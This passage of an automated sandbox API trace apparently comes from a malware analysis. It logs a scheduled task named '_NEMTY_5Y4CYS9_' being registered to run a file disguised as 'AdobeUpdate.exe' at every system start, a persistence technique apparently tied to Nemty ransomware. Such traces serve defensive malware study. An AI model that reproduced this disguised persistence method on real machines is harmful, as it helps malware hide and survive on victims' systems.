_Size=0x7) returned 0 [0071.509] SetLastError (dwErrCode=0x7a) [0071.509] SetLastError (dwErrCode=0x0) [0071.509] SetLastError (dwErrCode=0x0) [0071.509] lstrlenW (lpString="C") returned 1 [0071.509] SetLastError (dwErrCode=0x490) [0071.509] SetLastError (dwErrCode=0x0) [0071.509] _memicmp (_Buf1=0x494d98, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.509] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.509] GetProcessHeap () returned 0x480000 [0071.509] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e10) returned 1 [0071.509] GetProcessHeap () returned 0x480000 [0071.509] RtlReAllocateHeap (Heap=0x480000, Flags=0xc, Ptr=0x494e10, Size=0x5c) returned 0x496ad8 [0071.509] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.509] lstrlenW (lpString=" \x09") returned 2 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0071.509] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x6a) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0071.510] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0071.510] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0071.510] GetLastError () returned 0x0 [0071.510] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.510] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.510] SetLastError (dwErrCode=0x0) [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495448 [0071.511] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.511] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0071.511] lstrlenW (lpString="MINUTE") returned 6 [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xe) returned 0x494e10 [0071.511] GetThreadLocale () returned 0x409 [0071.511] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495428 [0071.511] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.511] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0071.511] lstrlenW (lpString="HOURLY") returned 6 [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xe) returned 0x494e28 [0071.511] GetThreadLocale () returned 0x409 [0071.511] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4953e8 [0071.511] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.511] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0071.511] lstrlenW (lpString="DAILY") returned 5 [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xc) returned 0x494e40 [0071.511] GetThreadLocale () returned 0x409 [0071.511] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0071.511] GetProcessHeap () returned 0x480000 [0071.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4954c8 [0071.511] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.511] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0071.511] lstrlenW (lpString="WEEKLY") returned 6 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xe) returned 0x494e58 [0071.512] GetThreadLocale () returned 0x409 [0071.512] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4954e8 [0071.512] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.512] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0071.512] lstrlenW (lpString="MONTHLY") returned 7 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494e70 [0071.512] GetThreadLocale () returned 0x409 [0071.512] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495508 [0071.512] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.512] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0071.512] lstrlenW (lpString="ONCE") returned 4 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xa) returned 0x494e88 [0071.512] GetThreadLocale () returned 0x409 [0071.512] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495528 [0071.512] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.512] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0071.512] lstrlenW (lpString="ONSTART") returned 7 [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494ea0 [0071.512] GetThreadLocale () returned 0x409 [0071.512] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onstart", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 2 [0071.512] SetLastError (dwErrCode=0x0) [0071.512] GetProcessHeap () returned 0x480000 [0071.512] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x1fc) returned 0x496b40 [0071.513] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.513] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0071.513] lstrlenW (lpString="First") returned 5 [0071.513] GetProcessHeap () returned 0x480000 [0071.513] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xc) returned 0x494eb8 [0071.513] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.513] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0071.513] lstrlenW (lpString="Second") returned 6 [0071.513] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.513] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0071.513] lstrlenW (lpString="Third") returned 5 [0071.513] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.513] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0071.513] lstrlenW (lpString="Fourth") returned 6 [0071.513] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.513] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0071.513] lstrlenW (lpString="Last") returned 4 [0071.648] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.648] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0071.648] lstrlenW (lpString="First") returned 5 [0071.648] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.648] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0071.648] lstrlenW (lpString="Second") returned 6 [0071.648] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.649] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0071.649] lstrlenW (lpString="Third") returned 5 [0071.649] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.649] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0071.649] lstrlenW (lpString="Fourth") returned 6 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e88) returned 1 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e88) returned 0xa [0071.649] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e88 | out: hHeap=0x480000) returned 1 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xe) returned 0x494e88 [0071.649] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.649] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0071.649] lstrlenW (lpString="Last") returned 4 [0071.649] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x13ca78, cchData=128 | out: lpLCData="0") returned 2 [0071.649] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.649] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0071.649] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494eb8) returned 1 [0071.649] GetProcessHeap () returned 0x480000 [0071.649] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494eb8) returned 0xc [0071.650] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494eb8 | out: hHeap=0x480000) returned 1 [0071.650] GetProcessHeap () returned 0x480000 [0071.650] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x16) returned 0x495548 [0071.650] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x13ca80, cchData=128 | out: lpLCData="0") returned 2 [0071.650] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.650] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0071.650] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0071.650] GetLocalTime (in: lpSystemTime=0x13cc30 | out: lpSystemTime=0x13cc30*(wYear=0x7e3, wMonth=0xa, wDayOfWeek=0x6, wDay=0x5, wHour=0xb, wMinute=0x2, wSecond=0x2e, wMilliseconds=0x49)) [0071.650] GetLocalTime (in: lpSystemTime=0x13d04c | out: lpSystemTime=0x13d04c*(wYear=0x7e3, wMonth=0xa, wDayOfWeek=0x6, wDay=0x5, wHour=0xb, wMinute=0x2, wSecond=0x2e, wMilliseconds=0x49)) [0071.650] lstrlenW (lpString="") returned 0 [0071.650] lstrlenW (lpString="") returned 0 [0071.650] lstrlenW (lpString="") returned 0 [0071.650] lstrlenW (lpString="") returned 0 [0071.650] lstrlenW (lpString="") returned 0 [0071.650] lstrlenW (lpString="") returned 0 [0071.650] lstrlenW (lpString="") returned 0 [0071.650] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0072.034] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0072.142] CoCreateInstance (in: rclsid=0xfb230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xfb20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x13d004 | out: ppv=0x13d004*=0x293dd8) returned 0x0 [0072.304] TaskScheduler:ITaskService:Connect (This=0x293dd8, serverName=0x13cf74*(varType=0x8, wReserved1=0x2e53, wReserved2=0xd008, wReserved3=0x13, varVal1=0x0, varVal2=0x13cfec), user=0x13cf84*(varType=0x0, wReserved1=0x7596, wReserved2=0x93bf, wReserved3=0xf72e, varVal1=0x13eae0, varVal2=0x13def0), domain=0x13cf94*(varType=0x0, wReserved1=0xed83, wReserved2=0xdeb8, wReserved3=0x13, varVal1=0xfb994e, varVal2=0x13f4dc), password=0x13cfa4*(varType=0x0, wReserved1=0x7719, wReserved2=0x3c, wReserved3=0x0, varVal1=0x2e53f000, varVal2=0xffffffac)) returned 0x0 [0072.376] TaskScheduler:IUnknown:AddRef (This=0x293dd8) returned 0x2 [0072.376] TaskScheduler:ITaskService:GetFolder (in: This=0x293dd8, Path=0x0, ppFolder=0x13d0a8 | out: ppFolder=0x13d0a8*=0x293e40) returned 0x0 [0072.381] TaskScheduler:ITaskService:NewTask (in: This=0x293dd8, flags=0x0, ppDefinition=0x13d0b8 | out: ppDefinition=0x13d0b8*=0x293ea8) returned 0x0 [0072.524] ITaskDefinition:get_Actions (in: This=0x293ea8, ppActions=0x13d004 | out: ppActions=0x13d004*=0x293f20) returned 0x0 [0072.524] IActionCollection:Create (in: This=0x293f20, Type=0, ppAction=0x13d01c | out: ppAction=0x13d01c*=0x292670) returned 0x0 [0072.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0072.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0072.526] lstrlenW (lpString=" ") returned 1 [0072.526] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x47) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x6a) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0072.526] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0072.526] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.527] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0072.527] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe", wMatch=0x20) returned=" HALPmcxz\\AdobeUpdate.exe" [0072.527] lstrlenW (lpString="HALPmcxz\\AdobeUpdate.exe") returned 24 [0072.527] lstrlenW (lpString=" ") returned 1 [0072.527] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0072.527] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0072.528] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0072.528] IUnknown:Release (This=0x292670) returned 0x1 [0072.528] IUnknown:Release (This=0x293f20) returned 0x1 [0072.528] ITaskDefinition:get_Triggers (in: This=0x293ea8, ppTriggers=0x13cbf0 | out: ppTriggers=0x13cbf0*=0x2924f0) returned 0x0 [0072.528] ITriggerCollection:Create (in: This=0x2924f0, Type=8, ppTrigger=0x13cbfc | out: ppTrigger=0x13cbfc*=0x2926b0) returned 0x0 [0072.536] IUnknown:QueryInterface (in: This=0x2926b0, riid=0xfb1518*(Data1=0x2a9c35da, Data2=0xd357, Data3=0x41f4, Data4=([0]=0xbb, [1]=0xc1, [2]=0x20, [3]=0x7a, [4]=0xc1, [5]=0xb1, [6]=0xf3, [7]=0xcb)), ppvObject=0x13cbe8 | out: ppvObject=0x13cbe8*=0x2926b0) returned 0x0 [0072.537] IUnknown:Release (This=0x2926b0) returned 0x2 [0072.537] _vsnwprintf (in: _Buffer=0x13cb60, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0x13cb48 | out: _Buffer="2019-10-05T11:02:00") returned 19 [0072.537] ITrigger:put_StartBoundary (This=0x2926b0, StartBoundary="2019-10-05T11:02:00") returned 0x0 [0072.537] lstrlenW (lpString="") returned 0 [0072.537] lstrlenW (lpString="") returned 0 [0072.537] lstrlenW (lpString="") returned 0 [0072.537] lstrlenW (lpString="") returned 0 [0072.537] IUnknown:Release (This=0x2926b0) returned 0x1 [0072.537] IUnknown:Release (This=0x2924f0) returned 0x1 [0072.537] ITaskDefinition:get_Settings (in: This=0x293ea8, ppSettings=0x13d00c | out: ppSettings=0x13d00c*=0x292530) returned 0x0 [0072.537] lstrlenW (lpString="") returned 0 [0072.537] IUnknown:Release (This=0x292530) returned 0x1 [0072.537] GetLocalTime (in: lpSystemTime=0x13cefc | out: lpSystemTime=0x13cefc*(wYear=0x7e3, wMonth=0xa, wDayOfWeek=0x6, wDay=0x5, wHour=0xb, wMinute=0x2, wSecond=0x2e, wMilliseconds=0x365)) [0072.537] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x74d40000 [0072.538] GetProcAddress (hModule=0x74d40000, lpProcName="GetUserNameW") returned 0x74d5157a [0072.538] GetUserNameW (in: lpBuffer=0x13cf10, pcbBuffer=0x13cef8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13cef8) returned 1 [0072.538] ITaskDefinition:get_RegistrationInfo (in: This=0x293ea8, ppRegistrationInfo=0x13cf0c | out: ppRegistrationInfo=0x13cf0c*=0x293f68) returned 0x0 [0072.538] IRegistrationInfo:put_Author (This=0x293f68, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0072.538] _vsnwprintf (in: _Buffer=0x13cf10, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0x13ced0 | out: _Buffer="2019-10-05T11:02:46") returned 19 [0072.538] IRegistrationInfo:put_Date (This=0x293f68, Date="2019-10-05T11:02:46") returned 0x0 [0072.538] IUnknown:Release (This=0x293f68) returned 0x1 [0072.538] malloc (_Size=0xc) returned 0x292748 [0072.538] free (_Block=0x292748) [0072.538] lstrlenW (lpString="") returned 0 [0072.538] malloc (_Size=0xc) returned 0x292748 [0072.539] ITaskFolder:RegisterTaskDefinition (in: This=0x293e40, Path="_NEMTY_5Y4CYS9_", pDefinition=0x293ea8, flags=2, UserId=0x13cff4*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0x13d004*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x13d018*(varType=0x0, wReserved1=0x0, wReserved2=0xcca0, wReserved3=0x13, varVal1=0x0, varVal2=0x0), ppTask=0x13d0a4 | out: ppTask=0x13d0a4*=0x292788) returned 0x0 [0073.757] free (_Block=0x292748) [0073.757] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0073.757] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0073.757] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0073.757] GetProcessHeap () returned 0x480000 [0073.757] GetProcessHeap () returned 0x480000 [0073.757] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496aa0) returned 1 [0073.757] 